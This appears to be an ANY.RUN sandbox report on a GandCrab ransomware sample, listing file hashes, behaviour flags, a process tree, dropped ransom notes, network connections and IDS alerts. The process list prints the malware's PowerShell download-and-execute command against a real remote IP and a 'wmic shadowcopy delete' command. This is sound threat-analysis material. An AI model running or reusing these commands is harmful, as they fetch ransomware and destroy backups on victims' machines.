analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

test_ran.bat.zip.zip

Full analysis: https://app.any.run/tasks/7a730f6a-9af5-42b8-9506-7ae26e185d38
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Malware Trends Tracker     >>>
Analysis date: November 08, 2018, 09:29:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
ransomware
gandcrab
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

0F2F9DE6010D559B34C3143B2D6F385E

SHA1:

595C99433B564F1A57553CF5ED5E5A9B9FD573C5

SHA256:

DA0C26E8B5431ECC98B7541919CFBB67F2F50A002D9F195375C44BFDFBC35799

SSDEEP:

12:5TkfQCyj41IawO9w5b/rkkKftzXCHY2OXkWkTiTEa0n:tkyjU0O9w5GNSBAm5n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2372)

    • GandCrab keys found

      • powershell.exe (PID: 256)

    • Actions looks like stealing of personal data

      • powershell.exe (PID: 256)

    • Dropped file may contain instructions of ransomware

      • powershell.exe (PID: 256)

    • Writes file to Word startup folder

      • powershell.exe (PID: 256)

    • Renames files like Ransomware

      • powershell.exe (PID: 256)

    • Deletes shadow copies

      • powershell.exe (PID: 256)

    • Connects to CnC server

      • powershell.exe (PID: 256)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 1216)

    • Application launched itself

      • WinRAR.exe (PID: 3708)

    • Creates files like Ransomware instruction

      • powershell.exe (PID: 256)

    • Reads Internet Cache Settings

      • powershell.exe (PID: 256)

    • Creates files in the user directory

      • powershell.exe (PID: 256)

  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 256)

    • Application launched itself

      • chrome.exe (PID: 2792)

    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 256)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: test_ran.bat.zip
ZipUncompressedSize: 293
ZipCompressedSize: 291
ZipCRC: 0x45b18bc3
ZipModifyDate: 2018:11:08 10:29:25
ZipCompression: Deflated
ZipBitFlag: 0x0001
ZipRequiredVersion: 788
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
16
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winrar.exe no specs cmd.exe no specs #GANDCRAB powershell.exe wmic.exe no specs notepad.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3708"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\test_ran.bat.zip.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
1216"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\Rar$DIb3708.43025\test_ran.bat.zipC:\Program Files\WinRAR\WinRAR.exeWinRAR.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2372cmd /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIb1216.44211\test_ran.bat" "C:\Windows\system32\cmd.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
256powershell.exe IEX ((new-object net.webclient).downloadstring('http://198.211.105.99/kasa'));Invoke-SZYIITYRAYH;Start-Sleep -s 1000000;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2828"C:\Windows\system32\wbem\wmic.exe" shadowcopy deleteC:\Windows\system32\wbem\wmic.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
2147749908
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3968"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\QZWWJFJNT-DECRYPT.txtC:\Windows\system32\NOTEPAD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2792"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
1864"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x701100b0,0x701100c0,0x701100ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3568"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=568 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
1412"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=D6F98CAFFE73E5AAD170818777692A5C --mojo-platform-channel-handle=880 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
Total events
1 775
Read events
1 588
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
343
Text files
291
Unknown types
4

Dropped files

PID
Process
Filename
Type
256powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1U62HOBQO6KI2F9GDWBP.temp
MD5:
SHA256:
256powershell.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
MD5:
SHA256:
256powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
MD5:
SHA256:
256powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
MD5:
SHA256:
256powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
MD5:
SHA256:
256powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dfad6.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
256powershell.exeC:\Users\admin\AppData\QZWWJFJNT-DECRYPT.txttext
MD5:5AA4ECDB6AA285114A4C153EF6072F0F
SHA256:80A3A3E53E6DA3D7BD807F29D8E860EEE54B17DAE8004BB1B198722ED167D5FD
256powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Forms\QZWWJFJNT-DECRYPT.txttext
MD5:5AA4ECDB6AA285114A4C153EF6072F0F
SHA256:80A3A3E53E6DA3D7BD807F29D8E860EEE54B17DAE8004BB1B198722ED167D5FD
256powershell.exeC:\Users\admin\.oracle_jre_usage\QZWWJFJNT-DECRYPT.txttext
MD5:5AA4ECDB6AA285114A4C153EF6072F0F
SHA256:80A3A3E53E6DA3D7BD807F29D8E860EEE54B17DAE8004BB1B198722ED167D5FD
256powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\QZWWJFJNT-DECRYPT.txttext
MD5:5AA4ECDB6AA285114A4C153EF6072F0F
SHA256:80A3A3E53E6DA3D7BD807F29D8E860EEE54B17DAE8004BB1B198722ED167D5FD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
37
TCP/UDP connections
103
DNS requests
68
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
256
powershell.exe
GET
78.46.77.98:80
http://www.2mmotorsport.biz/
DE
suspicious
256
powershell.exe
GET
200
136.243.13.215:80
http://www.holzbock.biz/
DE
html
1.78 Kb
suspicious
256
powershell.exe
GET
192.185.159.253:80
http://www.pizcam.com/
US
malicious
256
powershell.exe
GET
301
83.166.138.7:80
http://www.whitepod.com/
CH
whitelisted
256
powershell.exe
GET
83.138.82.107:80
http://www.swisswellness.com/
DE
whitelisted
256
powershell.exe
GET
200
198.211.105.99:80
http://198.211.105.99/kasa
US
text
287 Kb
malicious
256
powershell.exe
GET
200
74.220.215.73:80
http://www.bizziniinfissi.com/
US
html
6.96 Kb
malicious
256
powershell.exe
POST
404
74.220.215.73:80
http://www.bizziniinfissi.com/includes/pictures/dehe.jpg
US
html
2.61 Kb
malicious
256
powershell.exe
POST
83.138.82.107:80
http://www.swisswellness.com/wp-content/assets/deameshe.jpg
DE
whitelisted
256
powershell.exe
GET
301
104.24.22.22:80
http://www.belvedere-locarno.com/
US
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
256
powershell.exe
136.243.13.215:80
www.holzbock.biz
Hetzner Online GmbH
DE
suspicious
256
powershell.exe
198.211.105.99:80
Digital Ocean, Inc.
US
malicious
256
powershell.exe
78.46.77.98:80
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
256
powershell.exe
74.220.215.73:80
www.bizziniinfissi.com
Unified Layer
US
malicious
256
powershell.exe
217.26.53.161:80
www.haargenau.biz
Hostpoint AG
CH
malicious
256
powershell.exe
109.234.38.95:80
www.fliptray.biz
Webzilla B.V.
RU
unknown
256
powershell.exe
78.46.77.98:443
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
256
powershell.exe
192.185.159.253:80
www.pizcam.com
CyrusOne LLC
US
malicious
256
powershell.exe
83.138.82.107:80
www.swisswellness.com
hostNET Medien GmbH
DE
suspicious
256
powershell.exe
109.234.38.95:443
www.fliptray.biz
Webzilla B.V.
RU
unknown

DNS requests

Domain
IP
Reputation
www.2mmotorsport.biz
  • 78.46.77.98
unknown
www.haargenau.biz
  • 217.26.53.161
unknown
www.bizziniinfissi.com
  • 74.220.215.73
malicious
www.holzbock.biz
  • 136.243.13.215
unknown
www.fliptray.biz
  • 109.234.38.95
malicious
www.pizcam.com
  • 192.185.159.253
unknown
www.swisswellness.com
  • 83.138.82.107
whitelisted
www.hotelweisshorn.com
  • 212.59.186.61
unknown
www.whitepod.com
  • 83.166.138.7
whitelisted
www.hardrockhoteldavos.com
  • 69.16.175.42
  • 69.16.175.10
whitelisted

Threats

PID
Process
Class
Message
256
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
256
powershell.exe
A Network Trojan was detected
ET TROJAN Possible Malicious PowerSploit PowerShell Script Observed over HTTP
256
powershell.exe
A Network Trojan was detected
ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity
256
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
256
powershell.exe
A Network Trojan was detected
ET POLICY Data POST to an image file (jpg)
256
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
256
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
256
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
256
powershell.exe
A Network Trojan was detected
ET POLICY Data POST to an image file (jpg)
256
powershell.exe
A Network Trojan was detected
ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
test_ran.bat.zip.zip